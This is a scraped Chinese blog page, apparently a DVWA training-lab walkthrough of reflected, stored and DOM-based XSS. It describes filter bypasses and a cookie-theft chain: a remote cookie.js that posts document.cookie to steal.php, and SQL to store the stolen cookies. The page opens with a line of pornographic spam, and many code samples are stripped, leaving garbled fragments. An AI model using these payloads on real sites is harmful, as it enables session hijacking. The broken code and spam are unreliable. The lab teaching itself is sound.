成人无码视频,亚洲精品久久久久av无码,午夜精品久久久久久毛片,亚洲 中文字幕 日韩 无码

資訊專(zhuān)欄INFORMATION COLUMN

DVWA-從入門(mén)到放棄之XSS(Reflected,Stored,DOM)

Eastboat / 3178人閱讀

摘要:且通過(guò)語(yǔ)句插入到數(shù)據(jù)庫(kù)中。所以存在存儲(chǔ)型漏洞操作步驟由于和輸入框均存在。如果有,則利用函數(shù)重新發(fā)起請(qǐng)求,將值改為操作步驟輸入,發(fā)現(xiàn)值改為使用大小寫(xiě),雙寫(xiě)繞過(guò)發(fā)現(xiàn)也不行,初步判斷應(yīng)該是把標(biāo)簽過(guò)濾掉了。

作為興趣,一直想把自己所知道基礎(chǔ)入門(mén)的知識(shí)總結(jié)一下。在總結(jié)的過(guò)程中也是一個(gè)不斷學(xué)習(xí)地過(guò)程,慢慢學(xué)吧

XSS-跨站腳本攻擊,在某種意義上也是一種注入型攻擊
XSS不僅僅限于JavaScript,還包括flash等其它腳本語(yǔ)言
根據(jù)惡意代碼是否存儲(chǔ)在服務(wù)器中,XSS可以分為存儲(chǔ)型的XSS(Stored)與反射型的XSS(Reflected)
DOM型的XSS由于其特殊性,是一種基于DOM樹(shù)的XSS,被分為第三種
XSS(Reflected) Low 代碼分析 
Hello " . $_GET[ "name" ] . "
"; } ?> #array_key_exists()函數(shù)檢查數(shù)組里是否有指定的鍵名或索引。有返回true,沒(méi)有返回false

可以看到,代碼直接引用了name參數(shù),并沒(méi)有任何的過(guò)濾與檢查,存在明顯的XSS漏洞

操作步驟

輸入


可以看到成功出現(xiàn)彈窗

F12進(jìn)入開(kāi)發(fā)者模式可以看到瀏覽器成功將我們的輸入作為HTML元素解釋運(yùn)行

Medium 代碼分析 

2.使用大小寫(xiě)繞過(guò),輸入
3.輸入其他標(biāo)簽,如
可以看到結(jié)果:




獲取到了當(dāng)前用戶(hù)的cookie,這結(jié)合csrf(跨站請(qǐng)求偽造)攻擊危害是很大的



High
代碼分析

Hello ${name}
";
}

?>

可以看到High級(jí)別的代碼使用了preg_replace函數(shù)執(zhí)行一個(gè)正則表達(dá)式的搜索和替換
其中/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i是正則表達(dá)式(.*)表示貪婪匹配,/i表示不區(qū)分大小寫(xiě)
所以在High級(jí)別的代碼中,所有關(guān)于

點(diǎn)擊Forward得到結(jié)果

F12打開(kāi)開(kāi)發(fā)者模式可以看到輸入內(nèi)容被前端html代碼解析運(yùn)行:

由于提交的結(jié)果存儲(chǔ)在數(shù)據(jù)庫(kù)中,所以每次刷新頁(yè)面,輸入的惡意代碼就會(huì)被執(zhí)行一次

Medium 代碼分析 

2.使用大小寫(xiě)繞過(guò),輸入
3.輸入其他標(biāo)簽,如

High
代碼分析

" . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . "
" );

    //mysql_close();
}

?>

和反射型XSS-High級(jí)別代碼功能一致。對(duì)name輸入內(nèi)容利用正則匹配刪除所有關(guān)于

其實(shí),在上述例子的XSS危害只是彈窗,并不能實(shí)際獲取到cookie,下面演示怎樣遠(yuǎn)程獲取用戶(hù)cookie:

原理:

由于script標(biāo)簽可以加載遠(yuǎn)程服務(wù)器的javascript代碼并且執(zhí)行,所以在遠(yuǎn)程服務(wù)器編寫(xiě)一個(gè)cookie.js

document.write("
");
document.write("");
document.write("
");
document.exploit.submit();

這段js代碼的作用是在頁(yè)面中構(gòu)造一個(gè)隱藏表單和一個(gè)隱藏域,內(nèi)容為當(dāng)前的cookie,并且以post方式發(fā)送到同目錄下的steal.php:

";
    }
    mysql_close();
}
?>

steal.php會(huì)將我們獲取到的cookie存到數(shù)據(jù)庫(kù)中,搞事之前先創(chuàng)建數(shù)據(jù)庫(kù)和相應(yīng)的表(字段):

create database dvwacookie;#創(chuàng)建數(shù)據(jù)庫(kù)
use dvwacookie;#進(jìn)入dvwacookie數(shù)據(jù)庫(kù)
create table low(id int not null auto_increment primary key,cookie varchar(100) not null);
#創(chuàng)建一個(gè)low表,字段id-int類(lèi)型,主鍵,值自動(dòng)增長(zhǎng)、字段cookie

接下來(lái)在XSS漏洞位置插入:



就可以獲取用戶(hù)cookie。參考鏈接在此,與本作者無(wú)關(guān)

XSS(DOM)

對(duì)于DOM型的XSS是一種基于DOM樹(shù)的一種代碼注入攻擊方式,可以是反射型的,也可以是存儲(chǔ)型的
最大的特點(diǎn)就是不與后臺(tái)服務(wù)器交互,只是通過(guò)瀏覽器的DOM樹(shù)解析產(chǎn)生



介紹下DOM:


HTML DOM 是關(guān)于如何獲取、修改、添加或刪除 HTML 元素的標(biāo)準(zhǔn)
簡(jiǎn)單來(lái)說(shuō)DOM主要研究的是節(jié)點(diǎn),所有節(jié)點(diǎn)可通過(guò)javascript訪問(wèn)(增,刪,改,查)



可能觸發(fā)DOM型XSS屬性:本實(shí)驗(yàn)中主要用到的就是document.write屬性


document.write屬性
document.referer屬性
innerHTML屬性
windows.name屬性
location屬性


Low
代碼分析

 


可以,很直接

操作步驟

1.正常輸入English和French,F(xiàn)12打開(kāi)開(kāi)發(fā)者模式可以看見(jiàn)






現(xiàn)在來(lái)分析一下




F12審查元素:




可以看到和之前正常輸入相比較,第一個(gè)option標(biāo)簽,就是被解釋運(yùn)行

Medium
代碼分析

,發(fā)現(xiàn)default值改為"English"
2.使用大小寫(xiě),雙寫(xiě)繞過(guò):、發(fā)現(xiàn)也不行,初步判斷應(yīng)該是把


發(fā)現(xiàn)和正常選擇"English"一樣
3.使用其他標(biāo)簽試試:link
PT src="127.0.0.1/cookie.js">
更新中。。。


           
               
                                           
                       
                 

            
                     
             
               

                   
 文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

                 
                   
轉(zhuǎn)載請(qǐng)注明本文地址:http://m.hztianpu.com/yun/31738.html

               

                      
               
              

              

                
相關(guān)文章

                
    
                             
                                                                    
  • 
                                                
    
                          
    DVWA-入門(mén)放棄XSS(Reflected,Stored,DOM)
    
                                                     
    摘要:且通過(guò)語(yǔ)句插入到數(shù)據(jù)庫(kù)中。所以存在存儲(chǔ)型漏洞操作步驟由于和輸入框均存在。如果有,則利用函數(shù)重新發(fā)起請(qǐng)求,將值改為操作步驟輸入,發(fā)現(xiàn)值改為使用大小寫(xiě),雙寫(xiě)繞過(guò)發(fā)現(xiàn)也不行,初步判斷應(yīng)該是把標(biāo)簽過(guò)濾掉了。

作為興趣,一直想把自己所知道基礎(chǔ)入門(mén)的知識(shí)總結(jié)一下。在總結(jié)的過(guò)程中也是一個(gè)不斷學(xué)習(xí)地過(guò)程,慢慢學(xué)吧
showImg(https://segmentfault.com/img/bVbt4Cy...
    
                                                   
                          
    
                                
    
                                    LdhAndroid
                                    
                                    評(píng)論0 
                                    收藏0 
                                
    
                          
    
                      
    
                    
    •  
                                                                                                                       
  • 
                                                
    
                          
    前端安全XSS攻擊
    
                                                     
    摘要:跨域腳本攻擊攻擊是最常見(jiàn)的攻擊,其重點(diǎn)是跨域和客戶(hù)端執(zhí)行。后端接收請(qǐng)求時(shí),驗(yàn)證請(qǐng)求是否為攻擊請(qǐng)求,攻擊則屏蔽。開(kāi)發(fā)安全措施首要是服務(wù)端要進(jìn)行過(guò)濾,因?yàn)榍岸说男r?yàn)可以被繞過(guò)。這種直接存在于頁(yè)面,無(wú)須經(jīng)過(guò)服務(wù)器返回就是基于本地的攻擊。

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見(jiàn)的Web攻擊,其重點(diǎn)是跨域和客戶(hù)端執(zhí)行。有人將XSS攻擊分為三種,分別是:

Re...
    
                                                   
                          
    
                                
    
                                    lmxdawn
                                    
                                    評(píng)論0 
                                    收藏0 
                                
    
                          
    
                      
    
                    
    •  
                                                                                       
  • 
                                                
    
                          
    前端——影子殺手篇
    
                                                     
    摘要:前言對(duì)于一個(gè)影子殺手而言,總能殺人于無(wú)形。前端也有影子殺手,它總是防不勝防地危害著你的網(wǎng)站本篇打算介紹一些前端的影子殺手們和。影子殺手們,由來(lái)已久,幾乎伴隨著整個(gè)互聯(lián)網(wǎng)的發(fā)展。

前言
對(duì)于一個(gè)影子殺手而言,總能殺人于無(wú)形。前端也有影子殺手,它總是防不勝防地危害著你的網(wǎng)站
本篇打算介紹一些前端的影子殺手們——XSS和CSRF?;蛟S,你對(duì)它恨之入骨;又或者,你運(yùn)用的得心應(yīng)手。恨之入骨,可能...
    
                                                   
                          
    
                                
    
                                    李世贊
                                    
                                    評(píng)論0 
                                    收藏0 
                                
    
                          
    
                      
    
                    
    •  
                                                                           
                

              

              
               

                  
                  
發(fā)表評(píng)論

                   
               

              

                

                  
0條評(píng)論
   
                
 
                      

              

           

           
        

      
 
    

    
     

      
    

    
    

    
       
       

         
閱讀需要支付1元查看
  
         
     
       

      
  
    
    












<